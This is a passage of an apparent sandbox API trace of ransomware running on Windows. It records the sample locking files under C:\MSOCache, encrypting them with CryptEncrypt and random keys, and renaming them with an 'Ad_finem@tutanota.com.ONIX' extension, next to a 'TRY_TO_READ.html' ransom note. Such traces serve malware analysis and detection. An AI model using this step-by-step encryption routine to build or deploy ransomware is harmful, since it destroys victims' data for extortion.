lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.903] WriteFile (in: hFile=0x38c, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.904] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x93a) returned 0x4b6b68 [0095.904] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x93a) returned 0x4b74b0 [0095.904] SetFilePointer (in: hFile=0x38c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.904] ReadFile (in: hFile=0x38c, lpBuffer=0x4b6b68, nNumberOfBytesToRead=0x93a, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b6b68*, lpNumberOfBytesRead=0x367f44c*=0x93a, lpOverlapped=0x0) returned 1 [0095.904] SetFilePointer (in: hFile=0x38c, lDistanceToMove=-2362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.905] WriteFile (in: hFile=0x38c, lpBuffer=0x4b74b0*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b74b0*, lpNumberOfBytesWritten=0x367f44c*=0x93a, lpOverlapped=0x0) returned 1 [0095.906] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6b68 | out: hHeap=0x410000) returned 1 [0095.906] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b74b0 | out: hHeap=0x410000) returned 1 [0095.906] UnlockFile (hFile=0x38c, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x93a, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0095.906] CloseHandle (hObject=0x38c) returned 1 [0095.907] GetProcessHeap () returned 0x410000 [0095.907] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0095.907] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0095.909] GetProcessHeap () returned 0x410000 [0095.909] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0095.909] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0095.909] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0095.909] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0095.909] FindNextFileW (in: hFindFile=0x48ea70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c1c230, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0095.909] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.909] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.909] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4585b0 [0095.909] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.909] GetLastError () returned 0x0 [0095.909] FindNextFileW (in: hFindFile=0x48ea70, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30c1c230, ftCreationTime.dwHighDateTime=0x1d5f247, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x14c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0095.909] CloseHandle (hObject=0x3cc) returned 1 [0095.909] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.910] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x23, wMilliseconds=0x149)) [0095.910] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0095.910] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0095.910] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0095.910] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0095.910] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0095.910] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.911] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.911] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x460008 [0095.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0095.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458638 | out: hHeap=0x410000) returned 1 [0095.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4a0 | out: hHeap=0x410000) returned 1 [0095.911] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48eab0 [0095.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.911] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.911] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0095.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.911] GetLastError () returned 0x0 [0095.911] FindNextFileW (in: hFindFile=0x48eab0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0095.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.911] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.911] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0095.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.911] GetLastError () returned 0x0 [0095.911] FindNextFileW (in: hFindFile=0x48eab0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0095.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0095.911] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0095.911] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0095.911] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0095.911] GetLastError () returned 0x0 [0095.911] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x390 [0095.912] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0095.912] LockFile (hFile=0x390, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1200204, nNumberOfBytesToLockHigh=0x0) returned 1 [0095.912] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.912] ReadFile (in: hFile=0x390, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0095.915] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.915] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.915] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0095.915] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0095.915] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", dwFileAttributes=0x80) returned 1 [0095.915] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned 73 [0095.915] GetProcessHeap () returned 0x410000 [0095.915] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x102) returned 0x467908 [0095.916] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" [0095.916] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0095.916] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=18874884) returned 1 [0095.916] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x1200204 [0095.916] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0095.916] GetProcessHeap () returned 0x410000 [0095.916] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0095.916] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0095.916] WriteFile (in: hFile=0x390, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0095.918] WriteFile (in: hFile=0x390, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0095.919] WriteFile (in: hFile=0x390, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0095.920] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1200204) returned 0x3680020 [0095.921] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x1200204) returned 0x4890020 [0095.921] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.921] ReadFile (in: hFile=0x390, lpBuffer=0x3680020, nNumberOfBytesToRead=0x1200204, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x1200204, lpOverlapped=0x0) returned 1 [0096.662] SetFilePointer (in: hFile=0x390, lDistanceToMove=-18874884, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.662] WriteFile (in: hFile=0x390, lpBuffer=0x4890020*, nNumberOfBytesToWrite=0x1200204, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4890020*, lpNumberOfBytesWritten=0x367f44c*=0x1200204, lpOverlapped=0x0) returned 1 [0096.926] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x3680020 | out: hHeap=0x410000) returned 1 [0097.007] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4890020 | out: hHeap=0x410000) returned 1 [0097.090] UnlockFile (hFile=0x390, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1200204, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0097.090] CloseHandle (hObject=0x390) returned 1 [0097.361] GetProcessHeap () returned 0x410000 [0097.361] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0097.361] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0097.363] GetProcessHeap () returned 0x410000 [0097.363] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0097.363] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0097.363] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0097.363] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0097.364] FindNextFileW (in: hFindFile=0x48eab0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0097.364] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0097.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458638 [0097.364] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.364] GetLastError () returned 0x0 [0097.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xc0) returned 0x43e3f8 [0097.364] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458638 | out: hHeap=0x410000) returned 1 [0097.364] GetLastError () returned 0x0 [0097.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x20) returned 0x47f4a0 [0097.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x30) returned 0x470a68 [0097.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0097.364] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0097.364] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470a68 | out: hHeap=0x410000) returned 1 [0097.364] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f4a0 | out: hHeap=0x410000) returned 1 [0097.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xa0) returned 0x449d98 [0097.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x100) returned 0x48df08 [0097.364] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x8) returned 0x4b2770 [0097.364] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x390 [0097.365] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0097.366] LockFile (hFile=0x390, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x2fac00, nNumberOfBytesToLockHigh=0x0) returned 1 [0097.366] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.366] ReadFile (in: hFile=0x390, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0097.367] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.367] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.367] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0097.368] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0097.368] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", dwFileAttributes=0x80) returned 1 [0097.368] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned 79 [0097.368] GetProcessHeap () returned 0x410000 [0097.368] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10e) returned 0x467908 [0097.368] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" [0097.368] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0097.368] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=3124224) returned 1 [0097.368] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x2fac00 [0097.368] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0097.368] GetProcessHeap () returned 0x410000 [0097.368] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0097.368] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0097.369] WriteFile (in: hFile=0x390, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0097.370] WriteFile (in: hFile=0x390, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0097.371] WriteFile (in: hFile=0x390, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0097.372] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2fac00) returned 0x3680020 [0097.373] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x2fac00) returned 0x3980020 [0097.373] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.373] ReadFile (in: hFile=0x390, lpBuffer=0x3680020, nNumberOfBytesToRead=0x2fac00, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x2fac00, lpOverlapped=0x0) returned 1 [0097.542] UnlockFile (hFile=0x390, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x2fac00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0097.542] CloseHandle (hObject=0x390) returned 1 [0097.587] GetProcessHeap () returned 0x410000 [0097.588] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0097.588] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0097.592] GetProcessHeap () returned 0x410000 [0097.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0097.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0097.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0097.592] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0097.592] FindNextFileW (in: hFindFile=0x48eab0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, 